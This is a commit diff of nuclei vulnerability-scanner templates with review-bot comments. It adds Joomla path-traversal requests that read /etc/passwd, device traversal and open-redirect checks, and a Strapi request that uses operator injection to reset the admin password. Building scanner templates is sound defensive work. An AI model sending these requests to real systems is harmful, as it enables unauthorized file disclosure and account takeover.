Merge pull request #89 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-09-08 17:37:15 +05:30 committed by GitHub
commit c4e1917f97
GPG Key ID: 4AEE18F83AFDEB23
86 changed files with 1520 additions and 824 deletions

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 |
| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 |
| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 |
| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 |
| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | |
| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | |
| rce | 193 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | |
| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | |
| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | |
**147 directories, 1989 files**.
**150 directories, 2015 files**.
</td>
</tr>
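Review bot: the TYPE counts in the new rows sum to 1955 (1859 http + 46 file + 39 network + 11 dns) against the 2015 files in the totals line, the same 60-file gap of non-template files as before the change (1929 of 1989), so the regenerated numbers are self-consistent; the row reorderings (`lfi` now above `xss`, `tech` replaced by `cve2021`) are just the top-10 cutoff moving and should not be hand-maintained. This README copy is identical to the standalone stats table further down in this commit, so keep it strictly generator-produced.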

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 |
| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 |
| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 |
| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 |
| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | |
| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | |
| rce | 193 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | |
| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | |
| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | |
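Review bot: this table is a byte-for-byte copy of the one in the README hunk above; the two copies match in this commit, but two generated copies of the same data in one repository will desync the first time someone touches one by hand. If this file is the canonical stats output, have the README embed or link it instead of carrying its own copy.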

View File

@ -4,7 +4,7 @@ info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
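Review bot: the name still says `Deserialization Vulnerability` while the description, in both the old and the new wording, describes PHP code injection into the generated configuration file via a crafted POST to the setup script, which is what the PMASA-2009-3 reference covers; make the name match the description, and add the affected versions from the referenced advisory so a reader knows which releases the template targets. Also spell the product `phpMyAdmin` rather than `PhpMyAdmin`.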
@ -33,4 +33,4 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
- "root:.*:0:0:"
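Review bot: the only change in this hunk is the missing newline at end of file after the `root:.*:0:0:` regex, which is harmless; but this pattern, and the `root:.*:0:0` variant used by the seven new Joomla templates in this commit, lets `.*` accept anything between `root:` and `:0:0` on the line, whereas the `root:[x*]:0:0` form used by the two 0x_Akoko templates pins the password field to `x` or `*`. Standardizing on the stricter form across the repository would cost nothing and reduce accidental matches.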

View File

@ -2,7 +2,7 @@ id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
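Review bot: the description is a product blurb and never states the vulnerability the template checks for; the name says RFI, so add a sentence naming the vulnerable script and parameter as given in the exploit-db reference, and carry the affected version (`<= 1.1b2`) into the description as well as the name.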

View File

@ -0,0 +1,27 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
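Review bot: the trailing `%00` in `controller=../../../../../../../../../../etc/passwd%00` relies on null-byte truncation of the include path, which PHP removed in 5.3.4, so on a patched PHP the include fails with a warning instead of returning /etc/passwd; that is a false negative rather than a false positive, but it deserves a comment, and since the six sibling Joomla templates in this commit share this exact request and matcher shape, one comment covering all of them would do. The matcher itself is fine: `root:.*:0:0` anded with status 200.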

View File

@ -0,0 +1,27 @@
id: CVE-2010-1472
info:
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1473
info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1534
info:
name: Joomla! Component Shoutbox Pro - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12067
- https://www.cvedetails.com/cve/CVE-2010-1534
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
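Review bot: this template traverses only seven levels (`../../../../../../../etc/passwd%00`) while the sibling Joomla templates added in this commit use ten or more; seven covers a typical `/var/www/html` install but not deeper document roots, and extra `../` segments past the root are harmless, so use the same depth as the siblings.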

View File

@ -0,0 +1,27 @@
id: CVE-2010-1607
info:
name: Joomla! Component WMI 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1956
info:
name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12285
- https://www.cvedetails.com/cve/CVE-2010-1956
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
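Review bot: the name pins `Gadget Factory 1.0.0` while the description says 1.0.0 and 1.5.0 are affected; make the name `1.0.0/1.5.0` or drop the version from the name so the two do not disagree.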

View File

@ -0,0 +1,27 @@
id: CVE-2010-2920
info:
name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12120
- https://www.cvedetails.com/cve/CVE-2010-2920
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation,dwisiswant0,alex
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
tags: cve,cve2013,rce,struts,apache

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
author: suman_kar
severity: critical
description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
tags: cve,cve2016,iot,netgear,router
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
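Review bot: `The attacker can then use this password` has no antecedent in the new wording; the description never says that `BSW_cxttongr.htm` discloses the admin password (only the name does). Say it, e.g. `...access this page without authentication and read the administrator password it contains.`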
@ -32,4 +32,4 @@ requests:
part: body
group: 1
regex:
- '<b>Success "([a-z]+)"'
- '<b>Success "([a-z]+)"'

View File

@ -3,7 +3,7 @@ id: CVE-2017-15715
info:
name: Apache Arbitrary File Upload
author: geeknik
description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.
description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
severity: high
tags: cve,cve2017,apache,httpd,fileupload
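Review bot: this template uploads a file to the target and fetches it back (the `contains(body_2, "{{randstr_1}}")` matcher in the next hunk), so it should carry the `intrusive` tag that the Strapi template in this same commit uses; the tags line here only has `cve,cve2017,apache,httpd,fileupload`. The `are are` fix in the description is fine.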
@ -42,4 +42,4 @@ requests:
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr_1}}")'
- 'contains(body_2, "{{randstr_1}}")'

View File

@ -4,7 +4,7 @@ info:
name: Graphite 'graphite.composer.views.send_email' SSRF
author: huowuzhao
severity: high
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008

View File

@ -0,0 +1,28 @@
id: CVE-2018-14064
info:
name: VelotiSmart Wifi - Directory Traversal
author: 0x_Akoko
severity: high
description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
reference:
- https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
- https://www.exploit-db.com/exploits/45030
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064
tags: cve,cve2018,lfi,camera,iot
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
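Review bot: `root:[x*]:0:0` is the tighter matcher form and the other traversal templates in this commit should adopt it. For this path specifically, confirm that the `/../../etc/passwd` segments reach the wire unnormalized: any dot-segment cleaning in the HTTP client would collapse the request to `/etc/passwd` and silently turn the template into a 404 check, in which case a `raw:` request is the safer way to send it.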

View File

@ -0,0 +1,26 @@
id: CVE-2019-11013
info:
name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
author: 0x_Akoko
severity: high
reference:
- https://www.exploit-db.com/exploits/47301
- https://nvd.nist.gov/vuln/detail/CVE-2019-11013
tags: cve,cve2019,lfi,nimble
requests:
- method: GET
path:
- "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
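Review bot: the info block has no `description` (every other new template in this commit has one); add one from the NVD reference. Also `nimblesessionid=1484448` is the fixed value copied from the exploit-db PoC; if the server validates session ids it will need a real one, and if it does not, say so in a comment so the next editor does not treat it as a magic constant.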

View File

@ -5,7 +5,7 @@ info:
author: divya_mudgal
severity: critical
reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameter to the /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
tags: cve,cve2019,sqli,lansweeper
requests:

View File

@ -4,7 +4,7 @@ info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
author: bp0lr
severity: high
description: An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability.
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
tags: cve,cve2019,webmin,rce
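Review bot: severity is `high` while the name says unauthenticated remote command execution; the other unauthenticated RCEs touched in this commit (NETGEAR ProSAFE, Monitorr, WebLogic) are `critical`, so either raise it or state in the description why this one rates lower. Quoting the parameter as `'old'` is a good fix.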

View File

@ -0,0 +1,46 @@
id: CVE-2019-18818
info:
name: Strapi CMS - Admin password reset (Unauthenticated)
author: idealphase
description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
severity: critical
tags: cve,cve2019,strapi,auth-bypass,intrusive
requests:
- raw:
- |
POST /admin/auth/reset-password HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"username":'
- '"email":'
- '"jwt":'
part: body
extractors:
- type: json
json:
- .user.username
- .user.email
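Review bot: this template is destructive: the `{"code": {"$gt": 0}, ...}` body is an operator injection that matches any reset token, so a successful run sets the admin password to `SuperStrongPassword1` on every vulnerable target. The `intrusive` tag is present, which is right, but the description should say plainly that it changes the admin password so nobody runs it from a default scan profile. The response also carries a `"jwt":` (used as a matcher) that is a live admin session token; the extractors correctly pull only `.user.username` and `.user.email`, keep it that way and do not add the token to output.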

View File

@ -4,7 +4,7 @@ info:
name: Oracle Business Intelligence - Publisher XXE
author: madrobot
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
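Review bot: `allows unauthenticated attacker` still lacks its article in the new wording; make it `allows an unauthenticated attacker`. Otherwise the rewrite reads well.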

View File

@ -4,7 +4,7 @@ info:
name: YouPHPTube Encoder RCE
author: pikpikcu
severity: critical
description: A command injection have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
tags: cve,cve2019,rce

View File

@ -4,7 +4,7 @@ info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.
description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
reference:
- https://github.com/omarkurt/CVE-2019-5418
- https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/

View File

@ -0,0 +1,22 @@
id: CVE-2019-7275
info:
name: Open Redirect in Optergy Proton/Enterprise BMS
author: 0x_Akoko
severity: low
reference:
- https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
- https://applied-risk.com/resources/ar-2019-008
- https://cxsecurity.com/issue/WLB-2019110074
tags: cve,cve2019,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/updating.jsp?url=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
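Review bot: no `description` field; add one naming the product and version (the packetstorm reference title gives `2.3.0a`) and the vulnerable parameter (`url` on `/updating.jsp`). The `Location` regex's `(?:[a-zA-Z0-9\-_\.@]*)example\.com` prefix also matches `notexample.com`; a boundary such as `(?:^|[./@])` before `example\.com` would keep legitimate subdomains while rejecting look-alike domains.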

View File

@ -4,7 +4,7 @@ info:
name: GLPI v.9.4.6 - Open redirect
author: pikpikcu
severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6.
reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip

View File

@ -4,7 +4,7 @@ info:
name: Oracle WebLogic Server Administration Console Handle RCE
author: pdteam
severity: critical
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic
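Review bot: `severity: critical` does not square with `allows high privileged attackers` in the same description; an issue that needs an already-privileged console user is not critical on its own. If the template relies on an unauthenticated path to the console handler, the description should say so; otherwise lower the severity.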

View File

@ -4,7 +4,7 @@ info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability.
reference:
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
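Review bot: `severity: critical` on a template whose own description says it only detects the plugin, not the vulnerability, will raise critical findings on every patched install; lower it to the level this repository uses for presence checks (or check the vulnerable version), and note that the matcher at the end of the file is a bare `status: 200`, which is the weakest possible confirmation.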
@ -61,4 +61,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -4,7 +4,7 @@ info:
name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540)
author: geeknik
severity: medium
description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
reference: https://www.exploit-db.com/exploits/48812
tags: cve,cve2020,thinkadmin,lfi
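Review bot: `via GET request encode parameter` should read `via the encode GET parameter`; the `arbitrary files` fix is right. The name still says `Arbitrarily File Read`, make it `Arbitrary File Read` while here.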

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.
reference:
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
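Review bot: the new wording introduces a `debugCmd` parameter that the old description did not name; confirm it matches the request body in the template and the NCC advisory. `publicly exposed in the login.html webpage, which has to be publicly available` says publicly twice; one is enough.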

View File

@ -4,7 +4,7 @@ info:
name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
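Review bot: two leftovers in the new description: `with web access to could upload` (drop `to`) and `within the Monitorr` (drop `the`). The first sentence already says the template detects an RCE vulnerability, so the final `leading to remote code execution` repeats it.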

View File

@ -4,7 +4,7 @@ info:
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
author: LogicalHunter
severity: high
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
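Review bot: `any internal and external server` should be `any internal or external server`; the `attacker to make a request` fix is right.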

View File

@ -3,7 +3,7 @@ info:
name: UnRaid Remote Code Execution
author: madrobot
severity: high
description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code.
description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code.
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
tags: cve,cve2020,rce
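Review bot: `severity: high` is at odds with the reference, whose title says unauthenticated remote code execution as root; that is `critical` by the scale used elsewhere in this commit. The `arbitrary` fix is fine, and the description could name the affected version (the reference URL gives 6.8.0).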

View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: critical
tags: cve,cve2020,rce
description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2.
description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2.
reference:
- http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html
- http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html

View File

@ -2,7 +2,7 @@ id: CVE-2020-9402
info:
